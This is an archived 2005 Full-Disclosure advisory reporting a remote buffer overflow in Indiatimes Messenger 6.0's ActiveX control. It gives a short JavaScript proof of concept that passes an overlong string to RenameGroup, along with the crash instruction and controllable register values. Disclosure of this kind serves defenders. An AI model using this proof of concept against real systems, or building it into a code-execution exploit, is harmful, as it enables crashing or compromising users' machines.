|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
[Full-disclosure] Indiatimes Messenger 6.0 Buffer Overflow (Remote)
From: ViPeR (viper31337
yahoo.co.in)
Date: Wed Aug 31 2005 - 07:43:30 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Indiatimes Messenger 6.0 Buffer Overflow (Remote)
Vulnerable Program : Indiatimes Messenger v6.0
(Latest)
Vendor URL : http://messenger.indiatimes.com/
(Attempt to contact thru
http://messenger.indiatimes.com/feedback.htm failed!)
Exploit Type : Remote DoS (Remote Compromise may also
be possible)
Discovered by : Gregory R. Panakkal
Proof Of Concept:
[script]
var obj1 = new
ActiveXObject("MMClient.MunduMessenger.1");
var buf = "";
for(i=0; i<1000; i++)
{
buf += "A";
}
while(obj1.GetServerStatus() != "Logged In"); //wait
till login
obj1.RenameGroup("Friends", buf, 5);
[/script]
The program (MMClient.exe) crashes
004B681B 8979 04 mov dword ptr
ds:[ecx+4],edi
with registers ecx, and edi = 0x41414141
[controllable]
So, remote compromise maybe possible (not confirmed).
rgds,
Gregory R. Panakkal
http://www.infogreg.com
__________________________________________________________
Yahoo! India Matrimony: Find your partner online. Go to http://yahoo.shaadi.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]